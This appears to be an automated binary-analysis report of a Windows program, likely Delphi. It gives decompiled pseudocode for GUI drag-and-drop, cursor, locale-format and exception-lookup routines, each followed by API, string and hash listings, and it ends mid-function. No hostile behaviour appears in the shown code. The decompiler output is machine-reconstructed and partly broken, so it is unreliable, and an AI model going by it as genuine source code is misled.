
E00454604(); 						_v52 =  *((intOrPtr*)( *_t250 + 0x5c)); 						E0043A33C( *((intOrPtr*)( *_t250 + 0x60)),  &_v132); 						_t298 =  &_v48; 						asm("movsd"); 						asm("movsd"); 						asm("movsd"); 						asm("movsd"); 						 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t250 + 0x60)))) + 0x40))(); 						_v96.x = 0; 						_v96.y = 0; 						_t302 =  *((intOrPtr*)( *((intOrPtr*)( *_t250 + 0x60)) + 0x30)); 						_t316 = _t302; 						if(_t302 == 0) { 							_t303 =  *((intOrPtr*)( *_t250 + 0x60)); 							_t276 =  *0x4369e8; // 0x436a34 							_t167 = E00403AB4(_t303, _t276); 							__eflags = _t167; 							if(_t167 != 0) { 								__eflags =  *(_t303 + 0x1c4); 								if( *(_t303 + 0x1c4) != 0) { 									ClientToScreen( *(_t303 + 0x1c4),  &_v96); 								} 							} 						} else { 							 *((intOrPtr*)( *_t302 + 0x40))(); 						} 						OffsetRect( &_v48, _v96.x - _v88, _v96.y - _v84); 						E0043A55C( *((intOrPtr*)( *_t250 + 0x60)),  &_v140,  &_v80); 						_v32 = _v140; 						_v28 = _v136; 						E00455250( *((intOrPtr*)( *_t250 + 0x60)),  &_v148); 						E004376EC(_v148,  &_v140,  &_v144, _t316); 						E004047D4( &_v16, _v144); 						_v20 =  *((intOrPtr*)( *_t250 + 0x74)); 						_t188 =  *0x4626b8; // 0x436fb0 						_v68 = _t188; 						_v12 = 0; 						_t251 = 0; 						_v97 = E0043BC9C( *((intOrPtr*)( *_t250 + 0x60)), 0, 0xb030,  &_v72) == 0; 						if(_v97 != 0 &&  *((short*)( *_t250 + 0x15a)) != 0) { 							_t251 =  &_v97; 							 *((intOrPtr*)( *_t250 + 0x158))( &_v72); 						} 						if(_v97 == 0 ||  *((intOrPtr*)( *_t250 + 0x60)) == 0) { 							_t194 = 0; 						} else { 							_t194 = 1; 						} 						_t268 =  *_t250; 						 *((char*)( *_t250 + 0x58)) = _t194; 						if( *((char*)( *_t250 + 0x58)) == 0) { 							goto L23; 						} else { 							_t323 = _v16; 							if(_v16 == 0) { 								goto L23; 							} 							E00457F20(_v68, _t268, _t309); 							 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t250 + 0x84)))) + 0x74))(); 							 *((intOrPtr*)( *((intOrPtr*)( 
*((intOrPtr*)( *_t250 + 0x84)))) + 0xe8))( &_v113, _v12); 							OffsetRect( &_v113, _v64, _v60); 							if(E00403B24( *((intOrPtr*)( *_t250 + 0x84)), _t323) != 0) { 								_t238 = E00457F80(_v16, _t250, _t298, 0xffc7, _t309) + 5; 								_v113.left = _v113.left - _t238; 								_v113.right = _v113.right - _t238; 							} 							E0043A4AC( *((intOrPtr*)( *_t250 + 0x60)),  &_v140,  &_v48); 							_t218 =  *_t250; 							 *((intOrPtr*)(_t218 + 0x64)) = _v140; 							 *((intOrPtr*)(_t218 + 0x68)) = _v136; 							E0043A4AC( *((intOrPtr*)( *_t250 + 0x60)),  &_v140,  &(_v48.right)); 							_t222 =  *_t250; 							 *((intOrPtr*)(_t222 + 0x6c)) = _v140; 							 *((intOrPtr*)(_t222 + 0x70)) = _v136; 							E0043AB90( *((intOrPtr*)( *_t250 + 0x84)), _v52); 							_t115 =  *_t250 + 0x84; // 0xff7ce8c3 							 *((intOrPtr*)( *((intOrPtr*)( *_t115)) + 0xe4))(_v12); 							E0045539C(_v16); 							_t231 = _v24; 							if(_v24 <= 0) { 								E00457B58( *_t250, 1, _v20); 							} else { 								E00457B58( *_t250, 0, _t231); 							} 							L26: 							_pop(_t269); 							 *[fs:eax] = _t269; 							_push(E004583BE); 							E00404760( &_v148, 2); 							_t271 =  *0x44c7e8; // 0x44c7ec 							return E0040529C( &_v72, _t271); 						} 					} 				} 			}                        


                                                                            APIs
                                                                              • Part of subcall function 0044CBE4: GetActiveWindow.USER32 ref: 0044CBE7
                                                                              • Part of subcall function 0044CBE4: GetCurrentThreadId.KERNEL32 ref: 0044CBFC
                                                                              • Part of subcall function 0044CBE4: EnumThreadWindows.USER32(00000000,0044CBC4), ref: 0044CC02
                                                                              • Part of subcall function 00457DC8: GetCursor.USER32(?,?,?,?,?,?,?,?,?,?,?,004580D9,00000000,004583B7), ref: 00457DE3
                                                                              • Part of subcall function 00457DC8: GetIconInfo.USER32(00000000,?), ref: 00457DE9
                                                                            • ClientToScreen.USER32(?,?), ref: 00458161
                                                                            • OffsetRect.USER32(?,?,?), ref: 00458178
                                                                            • OffsetRect.USER32(?,?,?), ref: 004582A4
                                                                              • Part of subcall function 00457B58: SetTimer.USER32 ref: 00457B72
                                                                            Strings
                                                                            • 4jC , xrefs: 0045813E
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: OffsetRectThread$ActiveClientCurrentCursorEnumIconInfoScreenTimerWindowWindows
                                                                            • String ID: 4jC
                                                                            • API String ID: 2591747986-2900625241
                                                                            • Opcode ID: b8343d64523a10379c1ff20852f6b1ca7638a93d7df97c3be9be529c8dc35029
                                                                            • Instruction ID: 3c06f24524cbe1945d16a03846c9b40712580fa28ccc941ba7e8c22a91bf12dc
                                                                            • Opcode Fuzzy Hash: b8343d64523a10379c1ff20852f6b1ca7638a93d7df97c3be9be529c8dc35029
                                                                            • Instruction Fuzzy Hash: 27C1E435A00618CFCB10DFA9C494A9EB7F5BF49304F1081AAE905EB366DB34AD4ACF45
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 76%
                                                                                                                                  E0043B7E4(void* __eax, intOrPtr __ecx, intOrPtr __edx, signed char _a4) { 				intOrPtr _v8; 				signed char _v9; 				intOrPtr _v16; 				struct tagPOINT _v32; 				intOrPtr _v36; 				long _v40; 				char _v56; 				void* __edi; 				struct HWND__* _t57; 				void* _t63; 				signed char _t84; 				struct HWND__* _t108; 				void* _t110; 				intOrPtr _t134; 				intOrPtr _t137; 				void* _t141; 				struct HWND__* _t143; 				struct HWND__* _t147; 				void* _t152; 				void* _t154; 				intOrPtr _t155;  				_t152 = _t154; 				_t155 = _t154 + 0xffffffcc; 				_v8 = __ecx; 				_t137 = __edx; 				_t110 = __eax; 				if(__edx == 0 || __edx == 0xffffffff) { 					_t57 =  *(_t110 + 0x94); 					if(_t57 == 0 ||  *((char*)(_t57 + 0x1db)) == 0 ||  *((intOrPtr*)(_t57 + 0x1b0)) == 0) { 						E0041938C( *((intOrPtr*)(_t110 + 0x40)),  &_v40,  *((intOrPtr*)(_t110 + 0x44))); 						_v32.x = _v40; 						_v32.y = _v36; 						_t143 =  *(_t110 + 0x30); 						__eflags = _t143; 						if(_t143 != 0) { 							E0043A4AC(_t143,  &_v40,  &_v32); 							_v32.x = _v40; 							_v32.y = _v36; 						} 					} else { 						 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t57 + 0x1b0)))) + 0x14))(); 						MapWindowPoints(E004423F8( *(_t110 + 0x94)), 0,  &_v32, "true"); 					} 					_t63 = E0043A9A8(_t110); 					E004193DC(_v32.x, E0043A9BC(_t110), _v32.y,  &_v56, _t63); 					asm("movsd"); 					asm("movsd"); 					asm("movsd"); 					asm("movsd"); 					_v9 = E0043B9C4(_t110,  &_v32); 					goto L20; 				} else { 					E0043BCD0(__eax); 					__eflags =  *(_t110 + 0x94); 					if(__eflags == 0) { 						L12: 						_t84 = 1; 					} else { 						_t108 = E00403B24( *(_t110 + 0x94), __eflags); 						__eflags = _t108; 						if(_t108 != 0) { 							goto L12; 						} else { 							_t84 = 0; 						} 					} 					_v9 = _t84; 					__eflags = _v9; 					if(_v9 == 0) { 						L20: 						return _v9 & 0x000000ff; 					} 
else { 						_v16 = E00437D90(1, _t137); 						_push(_t152); 						_push(0x43b9b0); 						_push( *[fs:edx]); 						 *[fs:edx] = _t155; 						_t87 =  *(_t110 + 0x94); 						__eflags =  *(_t110 + 0x94); 						if( *(_t110 + 0x94) == 0) { 							_t147 = 0; 							__eflags = 0; 						} else { 							_t147 = E004423F8(_t87); 						} 						E0043A33C(_t110,  &_v32); 						__eflags = _t147; 						if(__eflags != 0) { 							MapWindowPoints(_t147, 0,  &_v32, "true"); 						} 						 *((intOrPtr*)(_v16 + 8)) = _t137; 						 *((char*)(_v16 + 0x5c)) = _a4 & 0x000000ff; 						 *((intOrPtr*)(_v16 + 0x60)) = _v8; 						asm("movsd"); 						asm("movsd"); 						asm("movsd"); 						asm("movsd"); 						_t141 = _t137; 						MapWindowPoints(0, E004423F8(_t141),  &_v32, 1); 						_push(_v32.y); 						E00403B24(_t141, __eflags); 						__eflags = 0; 						_pop(_t134); 						 *[fs:eax] = _t134; 						_push(0x43b9b7); 						return E00403928(_v16); 					} 				} 			}                        

                                                                            APIs
                                                                            • MapWindowPoints.USER32 ref: 0043B841
                                                                            • MapWindowPoints.USER32 ref: 0043B943
                                                                            • MapWindowPoints.USER32 ref: 0043B980
                                                                            Strings
                                                                            • QC , xrefs: 0043B8FC
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: PointsWindow
                                                                            • String ID: QC
                                                                            • API String ID: 4123100037-2823088291
                                                                            • Opcode ID: c87c83c8ec2422dba84d10b9213b873d1e9cb87eb2f57974cc0814849e7b209b
                                                                            • Instruction ID: 0050ec7504fc6389c387471725f03a9a37d0cdeba202718832385931f1dd160c
                                                                            • Opcode Fuzzy Hash: c87c83c8ec2422dba84d10b9213b873d1e9cb87eb2f57974cc0814849e7b209b
                                                                            • Instruction Fuzzy Hash: A5517071E002099BCB10DF69C881BEEB7F9EF49304F15506AEE14AB382C7789D05CBA5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 79%
                                                                                                                                  E0040BC90(void* __eax, void* __ebx, signed int __edx, void* __edi, void* __esi, void* __eflags) { 				intOrPtr _v8; 				char _v12; 				void* _v16; 				char _v20; 				char _v24; 				intOrPtr _t50; 				intOrPtr _t52; 				intOrPtr _t54; 				intOrPtr _t56; 				intOrPtr _t80; 				void* _t81; 				intOrPtr _t82; 				intOrPtr _t88; 				intOrPtr _t96; 				intOrPtr _t115; 				signed int _t123; 				signed int _t125; 				void* _t127; 				intOrPtr _t130; 				void* _t131;  				_t131 = __eflags; 				_push(0); 				_push(0); 				_push(0); 				_push(0); 				_push(0); 				_t125 = __edx; 				_t127 = __eax; 				_push(_t130); 				_push(0x40be60); 				_push( *[fs:eax]); 				 *[fs:eax] = _t130; 				_t96 = 1; 				E0040473C(__edx); 				E0040B954(GetThreadLocale(), 0x40be78, 0x1009,  &_v12); 				if(E00408B44(0x40be78, 1, _t131) + 0xfffffffd - 3 < 0) { 					while(1) { 						__eflags = _t96 - E004049FC(_t127); 						if(__eflags > 0) { 							goto L29; 						} 						asm("bt [0x461808], eax"); 						if(__eflags >= 0) { 							_t50 = E00409184(_t127 + _t96 - 1, 2, 0x40be7c); 							__eflags = _t50; 							if(_t50 != 0) { 								_t52 = E00409184(_t127 + _t96 - 1, 4, 0x40be8c); 								__eflags = _t52; 								if(_t52 != 0) { 									_t54 = E00409184(_t127 + _t96 - 1, 2, 0x40bea4); 									__eflags = _t54; 									if(_t54 != 0) { 										_t56 = ( *(_t127 + _t96 - 1) & 0x000000ff) - 0x59; 										__eflags = _t56; 										if(_t56 == 0) { 											L25: 											E00404A08(_t125, 0x40bebc); 										} else { 											__eflags = _t56 != 0x20; 											if(_t56 != 0x20) { 												E00404924(); 												E00404A08(_t125, _v24); 											} else { 												goto L25; 											} 										} 									} else { 										E00404A08(_t125, 0x40beb0); 										_t96 = _t96 + 1; 									} 								} else { 									E00404A08(_t125, 0x40be9c); 									_t96 = 
_t96 + 3; 								} 							} else { 								E00404A08(_t125, 0x40be88); 								_t96 = _t96 + 1; 							} 							_t96 = _t96 + 1; 							__eflags = _t96; 						} else { 							_v8 = E0040CD80(_t127, _t96); 							E00404C60(_t127, _v8, _t96,  &_v20); 							E00404A08(_t125, _v20); 							_t96 = _t96 + _v8; 						} 					} 				} else { 					_t80 =  *0x4658cc; // 0x9 					_t81 = _t80 - 4; 					if(_t81 == 0 || _t81 + 0xfffffff3 - 2 < 0) { 						_t82 = 1; 					} else { 						_t82 = 0; 					} 					if(_t82 == 0) { 						E00404790(_t125, _t127); 					} else { 						while(_t96 <= E004049FC(_t127)) { 							_t88 = ( *(_t127 + _t96 - 1) & 0x000000ff) - 0x47; 							__eflags = _t88; 							if(_t88 != 0) { 								__eflags = _t88 != 0x20; 								if(_t88 != 0x20) { 									_t123 =  *(_t127 + _t96 - 1) & 0x000000ff; 									_push(ds); 									asm("invalid"); 									_t8 = _t125 + _t125 * 8 - 0xbaa7401; 									 *_t8 =  *((intOrPtr*)(_t125 + _t125 * 8 - 0xbaa7401)) + 0x40be78; 									__eflags =  *_t8; 									E00404A08(_t125, _t123); 								} 							} 							_t96 = _t96 + 1; 							__eflags = _t96; 						} 					} 				} 				L29: 				_pop(_t115); 				 *[fs:eax] = _t115; 				_push(E0040BE67); 				return E00404760( &_v24, 4); 			}                        

                                                                            APIs
                                                                            • GetThreadLocale.KERNEL32(?,00000000,0040BE60,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0040BCBF
                                                                              • Part of subcall function 0040B954: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0040B972
                                                                            Strings
                                                                            • yyyy , xrefs: 0040BDB5
                                                                            • eeee , xrefs: 0040BDCE
                                                                            • ggg , xrefs: 0040BDA5
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: Locale$InfoThread
                                                                            • String ID: eeee$ggg$yyyy
                                                                            • API String ID: 4232894706-1253427255
                                                                            • Opcode ID: 22af1f82e12c2a638afe9ae91d7be04f620c0193c2544057d1f3039dc33699de
                                                                            • Instruction ID: e06779fda62c0aa1c2fe6e63d9f97ef423efd52b2f0bde73b2610bed017219b3
                                                                            • Opcode Fuzzy Hash: 22af1f82e12c2a638afe9ae91d7be04f620c0193c2544057d1f3039dc33699de
                                                                            • Instruction Fuzzy Hash: 0341D2B03041454BC711AA7AC8866BFF2E6DF95304B64443BAA51B73C6DB3CAD0296ED
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 83%
                                                                                                                                  E004389EC(intOrPtr __eax, intOrPtr __ecx, void* __edx, void* __fp0) { 				intOrPtr _v8; 				intOrPtr _v12; 				struct tagPOINT _v20; 				intOrPtr _v24; 				char _v28; 				char _v36; 				void* __edi; 				void* __ebp; 				intOrPtr _t54; 				intOrPtr _t60; 				intOrPtr _t65; 				intOrPtr _t71; 				intOrPtr _t74; 				void* _t88; 				intOrPtr _t105; 				intOrPtr _t115; 				intOrPtr _t116; 				intOrPtr _t120; 				intOrPtr _t123; 				intOrPtr _t124; 				intOrPtr _t129; 				void* _t133; 				intOrPtr _t134; 				void* _t137;  				_t137 = __fp0; 				_v8 = __ecx; 				_t88 = __edx; 				_t124 = __eax; 				 *0x466510 = __eax; 				_push(_t133); 				_push(0x438b91); 				_push( *[fs:edx]); 				 *[fs:edx] = _t134; 				_v12 = 0; 				 *0x466518 = 0; 				_t135 =  *((char*)(__eax + 0x8f)); 				if( *((char*)(__eax + 0x8f)) != 0) { 					E00403B24(__eax, __eflags); 					__eflags =  *0x466510; 					if( *0x466510 != 0) { 						__eflags = _v12; 						if(_v12 == 0) { 							_v12 = E00437D90(1, _t124); 							 *0x466518 = 1; 						} 						_t128 =  *((intOrPtr*)(_v12 + 0x40)); 						_t105 =  *0x4369e8; // 0x436a34 						_t54 = E00403AB4( *((intOrPtr*)(_v12 + 0x40)), _t105); 						__eflags = _t54; 						if(_t54 == 0) { 							_t129 =  *((intOrPtr*)(_v12 + 0x40)); 							__eflags =  *((intOrPtr*)(_t129 + 0x30)); 							if( *((intOrPtr*)(_t129 + 0x30)) != 0) { 								L14: 								__eflags = 0; 								E0041938C(0,  &_v36, 0); 								E0043A4AC(_t129,  &_v28,  &_v36); 								_t60 = _v12; 								 *((intOrPtr*)(_t60 + 0x4c)) = _v28; 								 *((intOrPtr*)(_t60 + 0x50)) = _v24; 								L15: 								__eflags =  *(_v12 + 0x4c) +  *((intOrPtr*)( *((intOrPtr*)(_v12 + 0x40)) + 0x48)); 								E0041938C( *(_v12 + 0x4c) +  *((intOrPtr*)( *((intOrPtr*)(_v12 + 0x40)) + 0x48)),  &_v28,  *((intOrPtr*)(_v12 + 0x50)) +  *((intOrPtr*)( *((intOrPtr*)(_v12 + 0x40)) + 0x4c))); 								_t65 
= _v12; 								 *((intOrPtr*)(_t65 + 0x54)) = _v28; 								 *((intOrPtr*)(_t65 + 0x58)) = _v24; 								goto L16; 							} 							_t116 =  *0x4369e8; // 0x436a34 							_t71 = E00403AB4(_t129, _t116); 							__eflags = _t71; 							if(_t71 != 0) { 								goto L14; 							} 							GetCursorPos( &_v20); 							_t74 = _v12; 							 *(_t74 + 0x4c) = _v20.x; 							 *((intOrPtr*)(_t74 + 0x50)) = _v20.y; 							goto L15; 						} else { 							GetWindowRect(E004423F8(_t128), _v12 + 0x4c); 							L16: 							asm("movsd"); 							asm("movsd"); 							asm("movsd"); 							asm("movsd"); 							L17: 							E0043887C(_v12, _v8, _t88, _t133, _t137); 							_pop(_t115); 							 *[fs:eax] = _t115; 							return 0; 						} 					} 					_pop(_t120); 					 *[fs:eax] = _t120; 					return 0; 				} 				E00403B24(__eax, _t135); 				if( *0x466510 != 0) { 					__eflags = _v12; 					if(_v12 == 0) { 						_v12 = E00437C80(_t124, 1); 						 *0x466518 = 1; 					} 					goto L17; 				} 				_pop(_t123); 				 *[fs:eax] = _t123; 				return 0; 			}                        

                                                                            0x00000000
                                                                            0x00438a8c
                                                                            0x00438a2e
                                                                            0x00438a3a
                                                                            0x00438a49
                                                                            0x00438a4d
                                                                            0x00438a61
                                                                            0x00438a64
                                                                            0x00438a64
                                                                            0x00000000
                                                                            0x00438a4d
                                                                            0x00438a3e
                                                                            0x00438a41
                                                                            0x00000000

                                                                            Strings
                                                                            • 4jC , xrefs: 00438ABA, 00438AF0
                                                                            • XQC , xrefs: 00438A57
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 4jC$XQC
                                                                            • API String ID: 0-1995860932
                                                                            • Opcode ID: 40d017accbd6cdc67a0eb8db3641b7ff0a2e78bce7532e2636fa8d279195c8d0
                                                                            • Instruction ID: 261b67947a93c7365b213fc49c75792a3b9849106cec410a1886ea52049641a3
                                                                            • Opcode Fuzzy Hash: 40d017accbd6cdc67a0eb8db3641b7ff0a2e78bce7532e2636fa8d279195c8d0
                                                                            • Instruction Fuzzy Hash: E4518F70A047099FCB00DF59D841A9EFBB5FF88318F2190AAF800A7351D779A985CB89
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 85%
E0043887C(intOrPtr* __eax, intOrPtr __ecx, intOrPtr __edx, void* __ebp, long long __fp0) {
    intOrPtr _v16;
    intOrPtr _t24;
    intOrPtr _t26;
    intOrPtr _t28;
    intOrPtr* _t32;
    intOrPtr _t35;
    intOrPtr _t37;
    struct HWND__* _t38;
    intOrPtr _t39;
    intOrPtr* _t41;
    intOrPtr _t45;
    intOrPtr _t49;
    intOrPtr* _t53;
    long _t58;
    intOrPtr _t59;
    intOrPtr _t60;
    intOrPtr* _t65;
    intOrPtr _t66;
    intOrPtr _t70;
    intOrPtr* _t77;
    void* _t79;
    intOrPtr* _t80;
    long long _t87;

    _t87 = __fp0;
    _t80 = _t79 + 0xfffffff8;
    _t70 = __ecx;
    _t45 = __edx;
    _t77 = __eax;
    *0x466514 = __eax;
    _t24 = *0x466514; // 0x0
    *((intOrPtr*)(_t24 + 8)) = 0;
    GetCursorPos(0x466520);
    _t26 = *0x466514; // 0x0
    _t58 = 0x466520->x; // 0x0
    *(_t26 + 0x10) = _t58;
    _t59 = *0x466524; // 0x0
    *((intOrPtr*)(_t26 + 0x14)) = _t59;
    *0x466528 = GetCursor();
    _t28 = *0x466514; // 0x0
    *0x46651c = E00437A5C(_t28);
    *0x46652c = _t70;
    _t60 = *0x43519c; // 0x4351e8
    if(E00403AB4(_t77, _t60) == 0) {
        __eflags = _t45;
        if(__eflags == 0) {
            *0x466530 = 0;
        } else {
            *0x466530 = 1;
        }
    } else {
        _t65 = _t77;
        _t4 = _t65 + 0x4c; // 0x4c
        _t41 = _t4;
        _t49 = *_t41;
        if( *((intOrPtr*)(_t41 + 8)) - _t49 <= 0) {
            __eflags = 0;
            *((intOrPtr*)(_t65 + 0x28)) = 0;
            *((intOrPtr*)(_t65 + 0x2c)) = 0;
        } else {
            *_t80 = *((intOrPtr*)(_t65 + 0x10)) - _t49;
            asm("fild dword [esp]");
            _v16 = *((intOrPtr*)(_t41 + 8)) - *_t41;
            asm("fild dword [esp+0x4]");
            asm("fdivp st1, st0");
            *((long long*)(_t65 + 0x28)) = __fp0;
            asm("wait");
        }
        _t66 = *((intOrPtr*)(_t41 + 4));
        if( *((intOrPtr*)(_t41 + 0xc)) - _t66 <= 0) {
            __eflags = 0;
            *((intOrPtr*)(_t77 + 0x30)) = 0;
            *((intOrPtr*)(_t77 + 0x34)) = 0;
        } else {
            _t53 = _t77;
            *_t80 = *((intOrPtr*)(_t53 + 0x14)) - _t66;
            asm("fild dword [esp]");
            _v16 = *((intOrPtr*)(_t41 + 0xc)) - *((intOrPtr*)(_t41 + 4));
            asm("fild dword [esp+0x4]");
            asm("fdivp st1, st0");
            *((long long*)(_t53 + 0x30)) = _t87;
            asm("wait");
        }
        if(_t45 == 0) {
            *0x466530 = 0;
        } else {
            *0x466530 = 2;
            *((intOrPtr*)( *_t77 + 0x30))();
        }
    }
    _t32 = *0x466514; // 0x0
    *0x466534 = *((intOrPtr*)( *_t32 + 8))();
    _t85 = *0x466534;
    if( *0x466534 != 0) {
        _t37 = *0x466524; // 0x0
        _t38 = GetDesktopWindow();
        _t39 = *0x466534; // 0x0
        E00443F74(_t39, _t38, _t85, _t37);
    }
    _t35 = E004038F8(1);
    *0x46653c = _t35;
    if( *0x466530 != 0) {
        _t35 = E00438594(0x466520, 1);
    }
    return _t35;
}


                                                                            APIs
                                                                            • GetCursorPos.USER32(00466520), ref: 0043889D
                                                                            • GetCursor.USER32(00466520), ref: 004388B9
                                                                              • Part of subcall function 00437A5C: SetCapture.USER32(00000000,?,004388CD,00466520), ref: 00437A6B
                                                                            • GetDesktopWindow.USER32 ref: 004389AB
                                                                            Strings
                                                                            • QC , xrefs: 004388DA
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: Cursor$CaptureDesktopWindow
                                                                            • String ID: QC
                                                                            • API String ID: 669539147-2823088291
                                                                            • Opcode ID: 200d8bcdea4dcfc9e7a4f1829237d1693a01099067dc619cf08afe8f43068f09
                                                                            • Instruction ID: ec58099d30e1c5017fec0aa898c8ab184d5e574ebc14b3c512b5b419d34dbb6a
                                                                            • Opcode Fuzzy Hash: 200d8bcdea4dcfc9e7a4f1829237d1693a01099067dc619cf08afe8f43068f09
                                                                            • Instruction Fuzzy Hash: 74415EB16052009FC304DF2DF985625BBE1BF88304B16956EE48A9B369EB75D841CF8A
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 86%
E0040C574(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr _a4) {
    char _v8;
    struct _MEMORY_BASIC_INFORMATION _v36;
    char _v297;
    char _v304;
    intOrPtr _v308;
    char _v312;
    char _v316;
    char _v320;
    intOrPtr _v324;
    char _v328;
    void* _v332;
    char _v336;
    char _v340;
    char _v344;
    char _v348;
    intOrPtr _v352;
    char _v356;
    char _v360;
    char _v364;
    void* _v368;
    char _v372;
    intOrPtr _t52;
    intOrPtr _t60;
    intOrPtr _t82;
    intOrPtr _t86;
    intOrPtr _t89;
    intOrPtr _t101;
    void* _t108;
    intOrPtr _t110;
    void* _t113;

    _t108 = __edi;
    _v372 = 0;
    _v336 = 0;
    _v344 = 0;
    _v340 = 0;
    _v8 = 0;
    _push(_t113);
    _push(0x40c72f);
    _push( *[fs:eax]);
    *[fs:eax] = _t113 + 0xfffffe90;
    _t89 = *((intOrPtr*)(_a4 - 4));
    if( *((intOrPtr*)(_t89 + 0x14)) != 0) {
        _t52 = *0x462dac; // 0x407654
        E00406740(_t52, &_v8);
    } else {
        _t86 = *0x462f40; // 0x40764c
        E00406740(_t86, &_v8);
    }
    _t110 = *((intOrPtr*)(_t89 + 0x18));
    VirtualQuery( *(_t89 + 0xc), &_v36, 0x1c);
    if(_v36.State != 0x1000 || GetModuleFileNameA(_v36.AllocationBase, &_v297, 0x105) == 0) {
        _v368 = *(_t89 + 0xc);
        _v364 = 5;
        _v360 = _v8;
        _v356 = 0xb;
        _v352 = _t110;
        _v348 = 5;
        _t60 = *0x462db8; // 0x4075fc
        E00406740(_t60, &_v372);
        E0040C158(_t89, _v372, 1, _t108, _t110, "true", &_v368);
    } else {
        _v332 = *(_t89 + 0xc);
        _v328 = 5;
        E004049AC( &_v340, 0x105, &_v297);
        E00408F20(_v340, &_v336);
        _v324 = _v336;
        _v320 = 0xb;
        _v316 = _v8;
        _v312 = 0xb;
        _v308 = _t110;
        _v304 = 5;
        _t82 = *0x462e34; // 0x407714
        E00406740(_t82, &_v344);
        E0040C158(_t89, _v344, 1, _t108, _t110, 3, &_v332);
    }
    _pop(_t101);
    *[fs:eax] = _t101;
    _push(E0040C736);
    E0040473C( &_v372);
    E00404760( &_v344, 3);
    return E0040473C( &_v8);
}


                                                                            APIs
                                                                            • VirtualQuery.KERNEL32(?,?,0000001C,00000000,0040C72F), ref: 0040C5DF
                                                                            • GetModuleFileNameA.KERNEL32(?,?,00000105,?,?,0000001C,00000000,0040C72F), ref: 0040C601
                                                                              • Part of subcall function 00406740: LoadStringA.USER32 ref: 00406772
                                                                            Strings
                                                                            • Lv@ , xrefs: 0040C5B9
                                                                            • Tv@ , xrefs: 0040C5C8
                                                                            Memory Dump Source
                                                                            • Source File: 0000000A.00000002.349688476.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000A.00000002.349677553.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349781310.0000000000461000.00000004.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349840485.0000000000468000.00000008.00020000.sdmp
                                                                            • Associated: 0000000A.00000002.349858482.000000000046C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID: FileLoadModuleNameQueryStringVirtual
                                                                            • String ID: Lv@$Tv@
                                                                            • API String ID: 902310565-3490928387
                                                                            • Opcode ID: 24279c15491266c301eb2aa81648ac00ce9ad9d101245f32d7359d387ba785dc
                                                                            • Instruction ID: c01818685c40b8fea18ad10fd3e77254e6e7d063cfafddee118467fe47f8fec1
                                                                            • Opcode Fuzzy Hash: 24279c15491266c301eb2aa81648ac00ce9ad9d101245f32d7359d387ba785dc
                                                                            • Instruction Fuzzy Hash: 30413670900668DFDB61DF64CC84BDAB7F5AB49304F4040EAE508AB391D7B8AE84CF95
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 65%
E0040BA08(void* __ebx, void* __edi, void* __esi) {
    int _v8;
    signed int _v12;
    char _v16;
    char _v20;
    char _v24;
    char _v28;
    void* _t53;
    void* _t54;
    intOrPtr _t80;
    void* _t83;
    void* _t84;
